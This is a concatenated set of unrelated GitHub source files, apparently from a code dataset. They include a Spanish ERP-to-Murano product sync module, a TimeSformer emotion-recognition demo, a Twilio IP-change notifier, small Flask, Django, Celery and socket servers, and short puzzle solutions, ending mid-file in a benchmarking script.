res\n\n\ndef _get_tipo_de_material(codigo):\n \"\"\"\n Devuelve el registro tipo de material de ginn correspondiente al código\n recibido de Murano.\n \"\"\"\n # pylint: disable=bad-continuation\n switcher = {'OIL': pclases.TipoDeMaterial.selectBy(\n descripcion='Aceites y lubricantes')[0],\n 'COM': pclases.TipoDeMaterial.selectBy(\n descripcion='Comercializados')[0],\n 'MAN': pclases.TipoDeMaterial.selectBy(\n descripcion='Mantenimiento')[0],\n 'MAP': pclases.TipoDeMaterial.selectBy(\n descripcion='Materia Prima')[0],\n 'GRANZA': pclases.TipoDeMaterial.selectBy(\n descripcion='Materia Prima')[0],\n 'MAT': pclases.TipoDeMaterial.selectBy(\n descripcion='Material adicional')[0],\n 'MIV': pclases.TipoDeMaterial.selectBy(\n descripcion='Mercancía inicial Valdemoro')[0],\n 'PCOM': pclases.TipoDeMaterial.selectBy(\n descripcion='Productos comercializados')[0],\n 'REF': pclases.TipoDeMaterial.selectBy(\n descripcion='Repuestos fibra')[0],\n 'REG': pclases.TipoDeMaterial.selectBy(\n descripcion='Repuestos geotextiles')[0]}\n return switcher.get(codigo, None)\n\n\ndef _update_producto_compra_ginn(prod_ginn, prod_murano):\n \"\"\"\n Actualiza los valores del producto de compra con los del producto en\n Murano.\n \"\"\"\n res = prod_ginn\n try:\n prod_ginn.descripcion = prod_murano['DescripcionArticulo']\n except UnicodeEncodeError:\n prod_ginn.descripcion = prod_murano['DescripcionArticulo'].encode(\n \"utf8\")\n prod_ginn.tipoDeMaterial = _get_tipo_de_material(\n prod_murano['CodigoFamilia'])\n prod_ginn.codigo = prod_murano['CodigoAlternativo']\n prod_ginn.unidad = prod_murano['UnidadMedida2_']\n prod_ginn.precioDefecto = prod_murano['PrecioVenta']\n # Si es Material (M) sí lo lleva. Si es Inmaterial o Comentario, no.\n prod_ginn.controlExistencias = prod_murano['TipoArticulo'] == \"M\"\n try:\n prod_ginn.observaciones = prod_murano['ComentarioArticulo']\n except UnicodeEncodeError:\n prod_ginn.observaciones = prod_murano.ComentarioArticulo.encode(\"utf8\")\n # Si está obsoleto para Murano, -1. Si no, 0\n prod_ginn.obsoleto = prod_murano['ObsoletoLc'] == -1\n try:\n proveedor = pclases.Proveedor.get(prod_murano['CodigoProveedor'])\n except (ValueError, pclases.SQLObjectNotFound):\n # Es un ID de un proveedor que no existe en ginn o está mal informado\n # en Murano y en lugar de un número es una cadena de texto.\n proveedor = None\n prod_ginn.proveedor = proveedor\n prod_ginn.minimo = prod_murano['StockMinimo']\n # Función de valoración y existencias ya no me interesan ni para sync.\n # prod_ginn.fvaloracion =\n # prod_ginn.existencias =\n return res\n\n\ndef _update_producto_venta_ginn(prod_ginn, prod_murano):\n \"\"\"\n Actualiza el registro de ginn conforme a los datos del registro de Murano.\n Tiene en cuenta el tipo de producto para actualizar también los valores\n de los registros relacionados camposEspecificos*.\n Se procura no machacar la descripción del producto en ginn. Admite más\n caracteres que en Murano y se usa para imprimir las etiquetas. 
Preferimos\n usar la descripción de ginn, que no está cortada para productos largos.\n \"\"\"\n res = _sync_campos_comunes_pv(prod_ginn, prod_murano)\n res = _sync_campos_especificos(prod_ginn, prod_murano)\n return res\n\n\ndef _sync_campos_comunes_pv(prod_ginn, prod_murano):\n \"\"\"\n Copia en el registro prod_ginn los valores de prod_murano comunes a todos\n los productos de venta.\n \"\"\"\n res = prod_ginn\n prod_ginn.lineaDeProduccion = _get_linea_produccion_ginn(\n prod_murano.DescripcionLinea)\n try:\n prod_ginn.nombre = prod_murano.Descripcion2Articulo\n except UnicodeEncodeError:\n # Por un error de sqlobject, no parece estar reconociendo bien el\n # encoding. Lo fuerzo para los casos del PV581 en polaco, por ejemplo.\n connection = pclases.sqlhub.getConnection()\n connection.dbEncoding = \"utf-8\"\n prod_ginn.nombre = prod_murano.Descripcion2Articulo\n if prod_murano.DescripcionArticulo:\n try:\n prod_ginn.descripcion = prod_murano.DescripcionArticulo\n except UnicodeEncodeError:\n connection = pclases.sqlhub.getConnection()\n connection.dbEncoding = \"utf-8\"\n prod_ginn.descripcion = prod_murano.DescripcionArticulo\n prod_ginn.codigo = prod_murano.CodigoAlternativo\n prod_ginn.arancel = prod_murano.CodigoArancelario\n prod_ginn.prodestandar = prod_murano.GEO_ProdEstandar\n prod_ginn.annoCertificacion = prod_murano.GEO_anno_certificacion\n prod_ginn.dni = prod_murano.GEO_Dni\n prod_ginn.uso = _get_uso_ginn(prod_murano.GEO_Uso)\n prod_ginn.obsoleto = prod_murano.ObsoletoLc == -1\n return res\n\n\ndef _sync_campos_especificos(prod_ginn, prod_murano):\n \"\"\"\n Sincroniza los campos específicos del producto de ginn con los de Murano.\n \"\"\"\n if prod_ginn.camposEspecificosRollo:\n res = _sync_campos_especificos_rollo(prod_ginn, prod_murano)\n elif prod_ginn.camposEspecificosBala:\n res = _sync_campos_especificos_bala(prod_ginn, prod_murano)\n else:\n res = _sync_campos_especificos_especial(prod_ginn, prod_murano)\n return res\n\n\ndef _sync_campos_especificos_rollo(prod_ginn, prod_murano):\n \"\"\"\n Sincroniza los campos relacionados con los geotextiles.\n \"\"\"\n res = prod_ginn\n cer = prod_ginn.camposEspecificosRollo\n if prod_murano.GEO_Cliente_id:\n if prod_murano.GEO_Cliente_id.startswith(\"C\"):\n # Como no admitimos id alfanuméricos y es poco probable que\n # lleguemos a un millón de clientes, uso los nuevos clientes\n # Cnnnnnn de Murano como 1nnnnnn en ginn.\n cliente_id = prod_murano.GEO_Cliente_id.replace(\"C\", \"1\")\n else:\n try:\n cliente_id = int(prod_murano.GEO_Cliente_id)\n except ValueError:\n cliente_id = prod_murano.GEO_Cliente_id\n try:\n cer.clienteID = cliente_id\n except TypeError:\n cer.clienteID = None\n res = False\n else:\n cer.clienteID = None\n if res:\n cer.gramos = prod_murano.GEO_gramos\n cer.codigoComposan = prod_murano.MarcaProducto\n cer.ancho = prod_murano.GEO_ancho\n cer.diametro = prod_murano.GEO_Diametro\n cer.rollosPorCamion = prod_murano.GEO_rollos_por_camion\n cer.metrosLineales = prod_murano.GEO_metros_lineales\n cer.pesoEmbalaje = prod_murano.GEO_peso_embalaje\n cer.modeloEtiqueta = _get_modelo_etiqueta_ginn(\n prod_murano.GEO_Modelo_etiqueta_id)\n cer.fichaFabricacion = prod_murano.GEO_Ficha_fabricacion\n res = _sync_marcado_ce(prod_ginn, prod_murano)\n return res\n\n\ndef _sync_marcado_ce(prod_ginn, prod_murano):\n \"\"\"\n Sincroniza los valores del marcado CE. 
Si han cambiado, se crea un\n registro histórico del marcado actual en ginn.\n \"\"\"\n res = prod_ginn\n # TODO: PORASQUI\n return res\n\n\ndef _sync_campos_especificos_bala(prod_ginn, prod_murano):\n \"\"\"\n Sincroniza los campos relacionados con la fibra.\n \"\"\"\n res = prod_ginn\n ceb = prod_ginn.camposEspecificosBala\n ceb.dtex = prod_murano.GEO_Dtex\n ceb.corte = prod_murano.GEO_Corte\n ceb.color = prod_murano.GEO_Color\n ceb.antiuv = prod_murano.GEO_antiuv == -1\n ceb.tipoMaterialBalaID = _get_tipo_material_bala_ginn(\n prod_murano.GEO_Tipo_Material_bala_id)\n ceb.consumoGranza = prod_murano.GEO_Consumo_granza\n ceb.reciclada = prod_murano.GEO_Reciclada == -1\n ceb.gramosBolsa = prod_murano.GEO_gramos_bolsa\n ceb.bolsasCaja = prod_murano.GEO_bolsas_Caja\n ceb.cajasPale = prod_murano.GEO_Cajas_pale\n ceb.modeloEtiqueta = _get_modelo_etiqueta_ginn(\n prod_murano.GEO_Modelo_etiqueta_id)\n if prod_murano.GEO_Cliente_id:\n if prod_murano.GEO_Cliente_id.startswith(\"C\"):\n # Como no admitimos id alfanuméricos y es poco probable que\n # lleguemos a un millón de clientes, uso los nuevos clientes\n # Cnnnnnn de Murano como 1nnnnnn en ginn.\n cliente_id = prod_murano.GEO_Cliente_id.replace(\"C\", \"1\")\n else:\n try:\n cliente_id = int(prod_murano.GEO_Cliente_id)\n except ValueError:\n cliente_id = prod_murano.GEO_Cliente_id\n try:\n ceb.clienteID = cliente_id\n except TypeError:\n ceb.clienteID = None\n res = False\n else:\n ceb.clienteID = None\n return res\n\n\ndef _sync_campos_especificos_especial(prod_ginn, prod_murano):\n \"\"\"\n No sincroniza nada porque los productos con CamposEspecificosEspedoal\n son pocos y los campos, obsoletos.\n \"\"\"\n res = prod_ginn\n return res\n\n\ndef get_canal(producto):\n \"\"\"\n Busca el canal del producto en Murano y devuelve el código de canal\n (HARCODED en `connection`) correspondiente. None si en Murano no tiene\n canal informado.\n Acepta objeto de pclases o código (como cadena) directamente.\n Si el producto no existe, lanza una excepción.\n \"\"\"\n if isinstance(producto, pclases.ProductoCompra):\n codigo = \"PC\" + str(producto.id)\n elif isinstance(producto, pclases.ProductoVenta):\n codigo = \"PV\" + str(producto.id)\n elif isinstance(producto, str):\n codigo = producto\n else:\n raise TypeError(\"ops::get_canal -> producto debe ser un \"\n \"pclases.ProductoCompra o pclases.ProductoVenta\")\n pmurano = get_producto_murano(codigo)\n canal = pmurano.CodigoCanal # pylint: disable=no-member\n try:\n cod_canal = CANALES[canal]\n except KeyError:\n cod_canal = None\n return cod_canal\n\n\ndef get_proyecto(producto):\n \"\"\"\n Busca el proyecto del producto en Murano y devuelve el código de proyecto\n (HARCODED en `connection`) correspondiente. 
Cero si en Murano no tiene\n proyecto informado («Sin informar»).\n Acepta objeto de pclases o código (como cadena) directamente.\n Si el producto no existe, lanza una excepción.\n \"\"\"\n if isinstance(producto, pclases.ProductoCompra):\n codigo = \"PC\" + str(producto.id)\n elif isinstance(producto, pclases.ProductoVenta):\n codigo = \"PV\" + str(producto.id)\n elif isinstance(producto, str):\n codigo = producto\n else:\n raise TypeError(\"ops::get_proyecto -> producto debe ser un \"\n \"pclases.ProductoCompra o pclases.ProductoVenta\")\n pmurano = get_producto_murano(codigo)\n cod_proyecto = pmurano.CodigoProyecto # pylint: disable=no-member\n return cod_proyecto\n\n\ndef get_stock_murano(producto, _almacen=None, _calidad=None, _unidad=None):\n \"\"\"\n Devuelve un diccionario por almacén con el stock del producto recibido\n tanto en unidades base como específica y calidad (si se aplican).\n Si se especifica código de almacén o unidad, solo devuelve las existencias\n para ese almacén y unidad.\n Ejemplos:\n {'GTX': {'A': {'KG': 100, 'ROLLO': 2},\n 'B': {'KG': 500, 'ROLLO': 10}},\n 'SUS': {'A': {'KG': 500, 'ROLLO': 10}}}\n {'GTX': {'UD': 13},\n 'RES': {'UD': 0}}\n \"\"\"\n if isinstance(producto, pclases.ProductoCompra):\n codigo = \"PC\" + str(producto.id)\n elif isinstance(producto, pclases.ProductoVenta):\n codigo = \"PV\" + str(producto.id)\n elif isinstance(producto, str):\n codigo = producto\n else:\n raise TypeError(\"ops::get_stock_murano -> producto debe ser un \"\n \"pclases.ProductoCompra o pclases.ProductoVenta\")\n pmurano = get_producto_murano(codigo)\n res = {}\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n rs_ejercicio = conn.run_sql(\"\"\"SELECT MAX(Ejercicio) AS ejercicio\n FROM {}.dbo.AcumuladoStock\n WHERE CodigoEmpresa = {};\n \"\"\".format(conn.get_database(),\n CODEMPRESA))\n ejercicio = rs_ejercicio[0]['ejercicio']\n codempresa = CODEMPRESA\n database = conn.get_database()\n periodo = 99\n sql = \"\"\"SELECT CodigoAlmacen, CodigoTalla01_, TipoUnidadMedida_,\n UnidadSaldo, UnidadSaldoTipo_\n FROM {}.dbo.AcumuladoStock\n WHERE CodigoEmpresa = {}\n AND Ejercicio = {}\n AND CodigoArticulo = '{}'\n AND Periodo = {};\n \"\"\".format(database,\n codempresa,\n ejercicio,\n pmurano['CodigoArticulo'],\n periodo)\n rs = conn.run_sql(sql)\n # Tratamiento de datos: los meto en un diccionario bien estructurado.\n for registro in rs: # Cada registro, el acumulado de una partida\n almacen = registro['CodigoAlmacen']\n calidad = registro['CodigoTalla01_']\n if almacen not in res:\n res[almacen] = {}\n if calidad not in res[almacen]:\n res[almacen][calidad] = defaultdict(lambda: 0.0)\n stock_basica = registro['UnidadSaldo']\n stock_especifica = registro['UnidadSaldoTipo_']\n unidad_especifica = registro['TipoUnidadMedida_']\n unidad_basica = pmurano['UnidadMedida2_']\n if _unidad:\n if _unidad == unidad_especifica:\n res[almacen][calidad][unidad_especifica] += float(\n stock_especifica)\n elif _unidad == unidad_basica:\n res[almacen][calidad][unidad_basica] += float(stock_basica)\n else:\n res[almacen][calidad][unidad_basica] += float(stock_basica)\n res[almacen][calidad][unidad_especifica] += float(stock_especifica)\n # Ahora filtro por los valores recibidos:\n # La unidad se filtra arriba directamente. La unidad (KG, BALA...) siempre\n # se devuelve para saber en qué está el valor. A no ser que (y por\n # simplificar) si me piden un almacén concreto, calidad y una dimensión\n # concreta, solo tendré un valor en el diccionario. 
Lo devuelvo\n # directamente.\n if _almacen is not None and _calidad is not None and _unidad is not None:\n try:\n res = res[_almacen][_calidad][_unidad]\n except KeyError:\n # O no hay stock para ese almacén, o en esa calidad o la unidad\n # es errónea.\n # Por simplificar, si pide una cantidad en concreto devuelvo float.\n res = 0.0 # pylint: disable=redefined-variable-type\n else:\n if _calidad:\n _res = {}\n for almacen in res:\n try:\n _res[almacen] = res[almacen][_calidad]\n except KeyError:\n # Esa calidad no está presente en el almacén\n _res[almacen] = {}\n res = _res\n if _almacen:\n res = res[_almacen]\n return res\n","repo_name":"pacoqueen/ginn","sub_path":"ginn/api/murano/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":160420,"program_lang":"python","lang":"es","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"42691994975","text":"\"\"\"\nThis file contains sample outputs of the TimeSformer model for each of the 6 different emotions.\n\nThis code was written and designed by Christopher du Toit.\n\"\"\"\n\nimport torch\nfrom timesformer.models.vit import TimeSformer\nfrom timesformer.datasets.decoder import decode\nimport os\nimport numpy as np\nimport pickle\nimport av\n\n\ndef load_np(filename):\n with open(os.path.join(r'C:\\Users\\Gebruiker\\Documents\\GitHub\\Research Internship extra', filename), 'rb') as r:\n video_arr = np.load(r)\n r.close()\n return video_arr\n\ndef load_video(filename):\n filename = os.path.join(r\"C:\\Users\\Gebruiker\\Documents\\GitHub\\Research_internship\", filename)\n video_container = av.open(filename)\n return video_container\n\ndef tensor_normalize(tensor, mean, std):\n if tensor.dtype == torch.uint8:\n tensor = tensor.float()\n tensor = tensor / 255.0\n\n if type(mean) == list:\n mean = torch.tensor(mean)\n\n if type(std) == list:\n std = torch.tensor(std)\n\n tensor = tensor - mean\n tensor = tensor / std\n return tensor\n\n\ndef timesformer_pred(filename, load_numpy=True):\n if load_numpy:\n video_arr = load_np(filename)\n video_torch = torch.from_numpy(video_arr)\n else:\n video_container = load_video(filename)\n video_torch = decode(video_container, 32, 8, -1, 1, )\n video_torch = tensor_normalize(video_torch, [0.45, 0.45, 0.45], [0.225, 0.225, 0.225])\n video_torch = video_torch.permute(3, 0, 1, 2)\n video_torch = torch.index_select(video_torch, 1, torch.linspace(0, video_torch.shape[1] - 1, 8).long(), )\n video_torch = video_torch.unsqueeze(0)\n pred = model(video_torch,)\n print_top_classes(pred)\n return video_torch\n\n\ndef print_top_classes(predictions, **kwargs):\n # Print Top-5 predictions\n prob = torch.softmax(predictions, dim=1)\n class_indices = predictions.data.topk(5, dim=1)[1][0].tolist()\n max_str_len = 0\n class_names = []\n for cls_idx in class_indices:\n class_names.append(labels[cls_idx])\n if len(labels[cls_idx]) > max_str_len:\n max_str_len = len(labels[cls_idx])\n\n print('Top 5 classes:')\n for cls_idx in class_indices:\n output_string = '\\t{} : {}'.format(cls_idx, labels[cls_idx])\n output_string += ' ' * (max_str_len - len(labels[cls_idx])) + '\\t\\t'\n output_string += 'value = {:.3f}\\t prob = {:.1f}%'.format(predictions[0, cls_idx], 100 * prob[0, cls_idx])\n print(output_string)\n\ndef topks_correct(preds, labels, ks):\n _top_max_k_vals, top_max_k_inds = torch.topk(\n preds, max(ks), dim=1, largest=True, sorted=True\n )\n top_max_k_inds = top_max_k_inds.t()\n rep_max_k_labels = labels.view(1, -1).expand_as(top_max_k_inds)\n top_max_k_correct = 
top_max_k_inds.eq(rep_max_k_labels)\n topks_correct = [top_max_k_correct[:k, :].float().sum() for k in ks]\n return topks_correct\n\n\nwith open(r\"C:\\Users\\Gebruiker\\Documents\\GitHub\\TimeSformer\\Results\\results_output\", 'rb') as f:\n x = pickle.load(f)\n\nf.close()\ntotal_correct = topks_correct(x[0], x[1], [1])\n\n\nmodel = TimeSformer(img_size=224, num_classes=6, num_frames=8, attention_type='divided_space_time', pretrained_model=r'C:\\Users\\Gebruiker\\Documents\\GitHub\\TimeSformer\\checkpoints\\checkpoint_epoch_00015.pyth')\nmodel.train()\nlabels = {0: 'happy', 1: 'sad', 2: 'anger', 3: 'fear', 4: 'disgust', 5: 'neutral'}\n\nfilename = os.path.join('avi_videos', '1025_MTI_HAP_XX.avi')\ntrue_label = 0\n\ntimesformer_pred(filename, load_numpy=False)\nprint(\"True label is\", labels[true_label])\nprint(x[0][258], x[1][258])\n\nfilename = os.path.join('avi_videos', '1003_TAI_SAD_XX.avi')\ntrue_label = 1\n\ntimesformer_pred(filename, load_numpy=False)\nprint(\"True label is\", labels[true_label])\nprint(x[0][259], x[1][259])\n\nfilename = os.path.join('avi_videos', '1052_TIE_ANG_XX.avi')\ntrue_label = 2\n\ntimesformer_pred(filename, load_numpy=False)\nprint(\"True label is\", labels[true_label])\nprint(x[0][32], x[1][32])\n\nfilename = os.path.join('avi_videos', '1045_TSI_FEA_XX.avi')\ntrue_label = 3\n\ntimesformer_pred(filename, load_numpy=False)\nprint(\"True label is\", labels[true_label])\nprint(x[0][75], x[1][75])\n\nfilename = os.path.join('avi_videos', '1014_TSI_DIS_XX.avi')\ntrue_label = 4\n\ntimesformer_pred(filename, load_numpy=False)\nprint(\"True label is\", labels[true_label])\nprint(x[0][307], x[1][307])\n\nfilename = os.path.join('avi_videos', '1014_IWW_NEU_XX.avi')\ntrue_label = 5\n\ntimesformer_pred(filename, load_numpy=False)\nprint(\"True label is\", labels[true_label])\nprint(x[0][269], x[1][269])\n\nexit(1)\n\nfilename = os.path.join('avi_custom', 'happy.avi')\ntrue_label = 0\n\ntimesformer_pred(filename, load_numpy=False)\nprint(\"True label is\", labels[true_label])\n\n\nfilename = os.path.join('avi_custom', 'anger.avi')\ntrue_label = 1\n\ntimesformer_pred(filename, load_numpy=False)\nprint(\"True label is\", labels[true_label])\n","repo_name":"chrisdt1998/Research_internship","sub_path":"timesformer_output.py","file_name":"timesformer_output.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34437627748","text":"import os\nimport time\nfrom requests import get\nfrom twilio.rest import Client\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\ndef sendMessage(ipAddress):\n client = Client(os.getenv(\"SID\"), os.getenv(\"AUTH\"))\n \n message = client.messages.create(\n \tfrom_ = os.getenv(\"TWILIO_NUMBER\"),\n \tbody = '{} is the new External IP'.format(ipAddress),\n \tto = os.getenv(\"PERSONAL_NUMBER\")\n )\n \n print(message.sid)\n\ndef get_ip():\n\tip = get('https://api.ipify.org').content.decode('utf8')\n\treturn '{}'.format(ip)\n\ndef main():\n\tprint(\"check_my_ip.py is running.\")\n\tip_checker = False\n\n\twhile ip_checker == False:\n\t\tf = open(\"ip.txt\", \"r\")\n\t\tip = f.readline()\n\t\tf.close()\n\n\t\tif str(ip) == str(get_ip()):\n\t\t\tprint(\"Same IP.\")\n\t\t\ttime.sleep(3600)\n\t\telse:\n\t\t\tprint(\"Sending new IP to {}\".format(os.getenv(\"PERSONAL_NUMBER\")))\n\t\t\tsendMessage(str(get_ip()))\n\n\t\t\tf = open(\"ip.txt\", 
\"w\")\n\t\t\tf.write(str(get_ip()))\n\t\t\tf.close()\n\t\t\ttime.sleep(3600)\n\nmain()\n\n\n\n\n\n\n\n","repo_name":"natefoxr/CheckMyIp","sub_path":"check_my_ip.py","file_name":"check_my_ip.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37869037481","text":"from socket import *\n\n\ndef create_server():\n\n server_socket = socket(AF_INET, SOCK_STREAM)\n\n try:\n server_socket.bind(('10.242.3.167', 8089))\n print(\"HERE\")\n server_socket.listen(5)\n while True:\n\n (clientSocket, address) = server_socket.accept()\n\n rd = clientSocket.recv(5000).decode()\n pieces = rd.split(\"\\n\")\n if len(pieces) > 0:\n print(pieces[0])\n\n data = \"HTTP/1.1 200 OK\\r\\n\" \\\n \"Content-Type: text/html; charset-utf-8\\r\\n\" \\\n \"\\r\\n\" \\\n \"Hello my friend 1\\r\\n\\r\\n\"\n\n clientSocket.sendall(data.encode())\n clientSocket.shutdown(SHUT_WR)\n\n except KeyboardInterrupt:\n print(\"\\nshutting down...\\n\")\n\n except Exception as exc:\n print(\"Error : \", end=\"\")\n print(exc)\n\n server_socket.close()\n\n\ncreate_server()\n","repo_name":"alibhr/GTU_Assignments","sub_path":"CSE476-Mobile_Communication_Networks/server-client-example/simple_server.py","file_name":"simple_server.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"3877342059","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.contrib.staticfiles.storage import staticfiles_storage\nfrom django.views.generic.base import RedirectView\n\nurlpatterns = [\n path('', include('pages.urls')),\n path('cocktails/', include('cocktails.urls')),\n path('cocktails/alcohol_categories/', include('alcohol.urls')),\n path('cocktails/categories/', include('drink_categories.urls')),\n path('cocktails/glass_types/', include('drink_glass_types.urls')),\n path('blogs/', include('blogs.urls')),\n path('blogs/categories/', include('blog_categories.urls')),\n path('events/', include('events.urls')),\n path('events/categories/', include('categories.urls')),\n path('events/event_types/', include('event_types.urls')),\n path('county/', include('counties.urls')),\n path('accounts/', include('allauth.urls')),\n path('contacts/', include('contacts.urls')),\n path('clubs/', include('clubs.urls')),\n path('genres/', include('genres.urls')),\n path('', include('google_analytics.urls')),\n path('admin/', admin.site.urls),\n # google adsense redirect configuration\n path('ads.txt', RedirectView.as_view(url=staticfiles_storage.url('ads.txt'))),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n# error handling\nhandler404 = 'pages.views.not_found'\nhandler500 = 'pages.views.server_error'\nhandler403 = 'pages.views.permission_denied'\nhandler400 = 'pages.views.bad_request'\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"Emichira/nightplankenya","sub_path":"night_plan/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32820733485","text":"# standard imports\nimport argparse\nimport os\n\n# external imports\nfrom celery import Celery\nfrom confini 
import Config\n\n# local imports\nfrom src.cache import initialize_cache\nfrom src.worker.celery_utils import create_celery_app\nfrom tasks import *\n\nlogging.basicConfig(level=logging.WARNING)\nlogg = logging.getLogger()\nlogging.getLogger('gnupg').setLevel(logging.WARNING)\n\nconfig_directory = '/usr/local/etc/cic-ussd/'\n\n# define arguments\narg_parser = argparse.ArgumentParser()\narg_parser.add_argument('-c', type=str, default=config_directory, help='config directory.')\narg_parser.add_argument('-q', type=str, default='cic-ussd', help='queue name for worker tasks')\narg_parser.add_argument('-v', action='store_true', help='be verbose')\narg_parser.add_argument('-vv', action='store_true', help='be more verbose')\narg_parser.add_argument('--env-prefix', default=os.environ.get('CONFINI_ENV_PREFIX'), dest='env_prefix', type=str,\n help='environment prefix for variables to overwrite configuration')\nargs = arg_parser.parse_args()\n\n# define log levels\nif args.vv:\n logging.getLogger().setLevel(logging.DEBUG)\nelif args.v:\n logging.getLogger().setLevel(logging.INFO)\n\n# parse config\nconfig = Config(args.c, args.env_prefix)\nconfig.process()\nconfig.add(args.q, '_CELERY_QUEUE', True)\nconfig.censor('PASSWORD', 'DATABASE')\nlogg.debug('config loaded from {}:\\n{}'.format(args.c, config))\n\ncurrent_app = Celery(__name__)\ncreate_celery_app(config)\n\ninitialize_cache(config)\n\n\ndef main():\n argv = ['worker']\n if args.vv:\n argv.append('--loglevel=DEBUG')\n elif args.v:\n argv.append('--loglevel=INFO')\n argv.extend(('-Q', args.q, '-n', args.q))\n current_app.worker_main(argv)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"grassrootseconomics/cic-text-interface","sub_path":"daemons/tasker.py","file_name":"tasker.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25216471922","text":"# https://leetcode.com/problems/gas-station/\n# tags: #greedy\n#\n# Solution: One pass\n# The main idea is that every time we go to the next station as far as possible (remained gas is bigger or equal to 0)\n# until we can not (remained gas is less than 0).\n# Then we must extend our start station to the \"last station\" (the station before start) to find a possible solution.\n# Repeat these two steps until we have checked all stations (start == end).\n#\n# We can travel around the circuit only if the remained gas is bigger or equal to 0\n# Time complexity: O(n), Space complexity O(1)\nfrom typing import List\n\n\nclass Solution:\n def canCompleteCircuit(self, gas: List[int], cost: List[int]) -> int:\n start, tank, total = 0, 0, 0\n\n for station in range(len(gas)):\n fuel = gas[station] - cost[station]\n tank += fuel\n total += fuel\n\n if tank < 0:\n tank = 0\n start = station + 1\n\n return start if total >= 0 else -1\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n print(sol.canCompleteCircuit(gas=[1, 2, 3, 4, 5], cost=[3, 4, 5, 1, 2])) # 3\n print(sol.canCompleteCircuit(gas=[2, 3, 4], cost=[3, 4, 3])) # -1\n","repo_name":"ronelzb/leetcode","sub_path":"array/0134_gas_station.py","file_name":"0134_gas_station.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"69967198121","text":"from collections import deque\n\ndata = open(\"./data.txt\", 'r').read()\n\nwin_size = 14\n\ndeck = deque()\nfor idx, c in enumerate(data):\n deck.append(c)\n if len(deck) == win_size:\n if len(set(deck)) 
== win_size:\n print(idx+1)\n break\n deck.popleft()\n","repo_name":"LeperGnome/AoC2022","sub_path":"src/tasks/day6/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15934411721","text":"import pyperclip\nimport re\nimport pprint\n\nphoneRegex = re.compile( r'''(\n (\\d{3}|\\(\\d{3}\\))? # Area Code\n (\\s|-|\\.)? # Separator\n (\\d{3}) # 1st 3 digits\n (\\s|-|\\.) # Separator\n (\\d{4}) # last 4 digits\n (\\s*(ext|x|ext.)\\s*(\\d{2,5}))?\n)''', re.VERBOSE)\n\nemailRegex = re.compile( r'''(\n [a-zA-Z0-9._-]+ # Username\n @ # @\n [a-zA-Z0-9.-]+ # Domain name\n \\. # .\n [a-zA-Z]{2,4} # TLD\n)''', re.VERBOSE)\n\nclipboardData = str(pyperclip.paste())\n\nmatches = []\n\nfor groups in phoneRegex.findall(clipboardData):\n phoneNum = '-'.join([groups[1], groups[3], groups[5]])\n if groups[8] != '':\n phoneNum += ' x' + groups[8]\n matches.append(phoneNum)\n\nfor groups in emailRegex.findall(clipboardData):\n matches.append(groups)\n\nif len(matches) > 0:\n pyperclip.copy('\\n'.join(matches))\n print('Copied to clipboard and written to phoneAndEmail.txt')\n f = open(\"phoneAndEmail.txt\", \"w+\")\n f.write(pprint.pformat(matches))\n f.close()\nelse:\n print('No phone numbers or email addresses found.')","repo_name":"AnandDev006/Python","sub_path":"python/src/phoneAndEmail/phoneAndEmail.py","file_name":"phoneAndEmail.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23386941046","text":"from flask import Flask, render_template\nfrom flask_socketio import SocketIO, send, emit\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'dev'\nsocketio = SocketIO(app)\n# socketio.init_app(app, cors_allowed_origins=None)\n\n@socketio.on('connect')\ndef connect():\n print('Client connected')\n\n@socketio.on('alert')\ndef handle_message(message):\n print('received message: ' + message)\n send(message, broadcast=True)\n\n@socketio.on('disconnect')\ndef disconnect():\n print(\"Client disconnected\")\n\nif __name__ == '__main__':\n socketio.run(app, debug=True)","repo_name":"pi2-fga/201901-SmartWay-Raspberry-API","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35361712862","text":"from contextlib import contextmanager\r\nfrom math import ceil\r\nimport os\r\nfrom subprocess import Popen\r\nfrom statistics import mean, stdev\r\nimport sys\r\nimport time\r\nfrom typing import List, Tuple, Callable\r\n\r\nfrom common import Problem, load_object, save_object\r\n\r\n\r\nPYTHON_PATH = 'python3.7'\r\nPYPY_PATH = 'pypy'\r\n\r\n\r\n@contextmanager\r\ndef timeit():\r\n class Watch:\r\n def __init__(self, start: float):\r\n self.start: float = start\r\n self.end: float = 0\r\n self.time: float = 0\r\n\r\n watch = Watch(start=time.perf_counter())\r\n try:\r\n yield watch\r\n finally:\r\n watch.end = time.perf_counter()\r\n watch.time = watch.end - watch.start\r\n\r\n\r\nclass Benchmark:\r\n def __init__(self, algorithm_tag: str, 